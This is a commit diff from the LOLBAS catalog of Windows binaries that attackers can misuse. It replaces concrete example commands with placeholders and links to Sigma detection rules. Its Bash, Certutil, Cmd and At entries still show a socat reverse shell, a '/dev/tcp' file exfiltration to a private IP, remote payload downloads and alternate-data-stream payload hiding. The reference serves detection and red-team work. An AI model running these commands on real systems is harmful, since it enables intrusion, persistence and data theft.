Skip to content

Commit 47d3072

Browse files
1 parent e71c1e8 commit 47d3072

File tree

196 files changed

+555
-758
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

196 files changed

+555
-758
lines changed

_lolbas/Binaries/AppInstaller.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@ Description: Tool used for installation of AppX/MSIX applications on Windows 10
44
Author: 'Wade Hickey'
55
Created: 2020-12-02
66
Commands:
7-
- Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
7+
- Command: start ms-appinstaller://?source={REMOTEURL:.exe}
88
Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache.
99
Usecase: Download file from Internet
1010
Category: Download

_lolbas/Binaries/At.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@ Description: Schedule periodic tasks
44
Author: 'Freddie Barr-Smith'
55
Created: 2019-09-20
66
Commands:
7-
- Command: C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
7+
- Command: C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su {CMD}
88
Description: Create a recurring task to execute every day at a specific time.
99
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
1010
Category: Execute

_lolbas/Binaries/Atbroker.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
---
22
Name: Atbroker.exe
33
Description: Helper binary for Assistive Technology (AT)
4-
Author: 'Oddvar Moe'
4+
Author: Oddvar Moe
55
Created: 2018-05-25
66
Commands:
77
- Command: ATBroker.exe /start malware

_lolbas/Binaries/Bash.md

Lines changed: 7 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -1,11 +1,11 @@
11
---
22
Name: Bash.exe
33
Description: File used by Windows subsystem for Linux
4-
Author: 'Oddvar Moe'
4+
Author: Oddvar Moe
55
Created: 2018-05-25
66
Commands:
7-
- Command: bash.exe -c calc.exe
8-
Description: Executes calc.exe from bash.exe
7+
- Command: bash.exe -c "{CMD}"
8+
Description: Executes executable from bash.exe
99
Usecase: Performs execution of specified file, can be used as a defensive evasion.
1010
Category: Execute
1111
Privileges: User
@@ -14,15 +14,15 @@ Commands:
1414
Tags:
1515
- Execute: CMD
1616
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
17-
Description: Executes a reverseshell
17+
Description: Executes a reverse shell
1818
Usecase: Performs execution of specified file, can be used as a defensive evasion.
1919
Category: Execute
2020
Privileges: User
2121
MitreID: T1202
2222
OperatingSystem: Windows 10
2323
Tags:
2424
- Execute: CMD
25-
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
25+
- Command: bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24'
2626
Description: Exfiltrate data
2727
Usecase: Performs execution of specified file, can be used as a defensive evasion.
2828
Category: Execute
@@ -31,8 +31,8 @@ Commands:
3131
OperatingSystem: Windows 10
3232
Tags:
3333
- Execute: CMD
34-
- Command: bash.exe -c calc.exe
35-
Description: Executes calc.exe from bash.exe
34+
- Command: bash.exe -c "{CMD}"
35+
Description: Executes executable from bash.exe
3636
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
3737
Category: AWL Bypass
3838
Privileges: User
@@ -43,8 +43,6 @@ Commands:
4343
Full_Path:
4444
- Path: C:\Windows\System32\bash.exe
4545
- Path: C:\Windows\SysWOW64\bash.exe
46-
Code_Sample:
47-
- Code:
4846
Detection:
4947
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
5048
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml

_lolbas/Binaries/Bitsadmin.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
---
22
Name: Bitsadmin.exe
33
Description: Used for managing background intelligent transfer
4-
Author: 'Oddvar Moe'
4+
Author: Oddvar Moe
55
Created: 2018-05-25
66
Commands:
77
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1

_lolbas/Binaries/Certoc.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@ Description: Used for installing certificates
44
Author: 'Ensar Samil'
55
Created: 2021-10-07
66
Commands:
7-
- Command: certoc.exe -LoadDLL "C:\test\calc.dll"
7+
- Command: certoc.exe -LoadDLL {PATH_ABSOLUTE:.dll}
88
Description: Loads the target DLL file
99
Usecase: Execute code within DLL file
1010
Category: Execute
@@ -13,7 +13,7 @@ Commands:
1313
OperatingSystem: Windows Server 2022
1414
Tags:
1515
- Execute: DLL
16-
- Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
16+
- Command: certoc.exe -GetCACAPS {REMOTEURL:.ps1}
1717
Description: Downloads text formatted files
1818
Usecase: Download scripts, webshells etc.
1919
Category: Download

_lolbas/Binaries/Certreq.md

Lines changed: 5 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -1,18 +1,18 @@
11
---
22
Name: CertReq.exe
33
Description: Used for requesting and managing certificates
4-
Author: 'David Middlehurst'
4+
Author: David Middlehurst
55
Created: 2020-07-07
66
Commands:
7-
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
8-
Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
7+
- Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt}
8+
Description: Send the specified file (penultimate argument) to the specified URL via HTTP POST and save the response to the specified txt file (last argument).
99
Usecase: Download file from Internet
1010
Category: Download
1111
Privileges: User
1212
MitreID: T1105
1313
OperatingSystem: Windows 10, Windows 11
14-
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini
15-
Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST and show response in terminal
14+
- Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE}
15+
Description: Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal.
1616
Usecase: Upload
1717
Category: Upload
1818
Privileges: User
@@ -21,8 +21,6 @@ Commands:
2121
Full_Path:
2222
- Path: C:\Windows\System32\certreq.exe
2323
- Path: C:\Windows\SysWOW64\certreq.exe
24-
Code_Sample:
25-
- Code:
2624
Detection:
2725
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml
2826
- IOC: certreq creates new files

_lolbas/Binaries/Certutil.md

Lines changed: 10 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -1,46 +1,46 @@
11
---
22
Name: Certutil.exe
33
Description: Windows binary used for handling certificates
4-
Author: 'Oddvar Moe'
4+
Author: Oddvar Moe
55
Created: 2018-05-25
66
Commands:
7-
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
8-
Description: Download and save 7zip to disk in the current folder.
7+
- Command: certutil.exe -urlcache -split -f {REMOTEURL:.exe} {PATH:.exe}
8+
Description: Download and save executable to disk in the current folder.
99
Usecase: Download file from Internet
1010
Category: Download
1111
Privileges: User
1212
MitreID: T1105
1313
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
14-
- Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
15-
Description: Download and save 7zip to disk in the current folder.
14+
- Command: certutil.exe -verifyctl -f -split {REMOTEURL:.exe} {PATH:.exe}
15+
Description: Download and save executable to disk in the current folder.
1616
Usecase: Download file from Internet
1717
Category: Download
1818
Privileges: User
1919
MitreID: T1105
2020
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
21-
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
21+
- Command: certutil.exe -urlcache -split -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt
2222
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
2323
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
2424
Category: ADS
2525
Privileges: User
2626
MitreID: T1564.004
2727
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
28-
- Command: certutil -encode inputFileName encodedOutputFileName
28+
- Command: certutil -encode {PATH} {PATH:.base64}
2929
Description: Command to encode a file using Base64
3030
Usecase: Encode files to evade defensive measures
3131
Category: Encode
3232
Privileges: User
3333
MitreID: T1027.013
3434
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
35-
- Command: certutil -decode encodedInputFileName decodedOutputFileName
35+
- Command: certutil -decode {PATH:.base64} {PATH}
3636
Description: Command to decode a Base64 encoded file.
3737
Usecase: Decode files to evade defensive measures
3838
Category: Decode
3939
Privileges: User
4040
MitreID: T1140
4141
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
42-
- Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName
43-
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
42+
- Command: certutil -decodehex {PATH:.hex} {PATH}
43+
Description: Command to decode a hexadecimal-encoded file.
4444
Usecase: Decode files to evade defensive measures
4545
Category: Decode
4646
Privileges: User
@@ -49,8 +49,6 @@ Commands:
4949
Full_Path:
5050
- Path: C:\Windows\System32\certutil.exe
5151
- Path: C:\Windows\SysWOW64\certutil.exe
52-
Code_Sample:
53-
- Code:
5452
Detection:
5553
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml
5654
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml

_lolbas/Binaries/Cmd.md

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -4,28 +4,28 @@ Description: The command-line interpreter in Windows
44
Author: Ye Yint Min Thu Htut
55
Created: 2019-06-26
66
Commands:
7-
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
7+
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.bat
88
Description: Add content to an Alternate Data Stream (ADS).
99
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
1010
Category: ADS
1111
Privileges: User
1212
MitreID: T1564.004
1313
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
14-
- Command: cmd.exe - < fakefile.doc:payload.bat
14+
- Command: cmd.exe - < {PATH}:payload.bat
1515
Description: Execute payload.bat stored in an Alternate Data Stream (ADS).
1616
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
1717
Category: ADS
1818
Privileges: User
1919
MitreID: T1059.003
2020
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
21-
- Command: type \\webdav-server\folder\file.ext > C:\Path\file.ext
21+
- Command: type {PATH_SMB} > {PATH_ABSOLUTE}
2222
Description: Downloads a specified file from a WebDAV server to the target file.
2323
Usecase: Download/copy a file from a WebDAV server
2424
Category: Download
2525
Privileges: User
2626
MitreID: T1105
2727
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
28-
- Command: type C:\Path\file.ext > \\webdav-server\folder\file.ext
28+
- Command: type {PATH_ABSOLUTE} > {PATH_SMB}
2929
Description: Uploads a specified file to a WebDAV server.
3030
Usecase: Upload a file to a WebDAV server
3131
Category: Upload

_lolbas/Binaries/Cmdkey.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
---
22
Name: Cmdkey.exe
33
Description: creates, lists, and deletes stored user names and passwords or credentials.
4-
Author: 'Oddvar Moe'
4+
Author: Oddvar Moe
55
Created: 2018-05-25
66
Commands:
77
- Command: cmdkey /list

0 commit comments

Comments
 (0)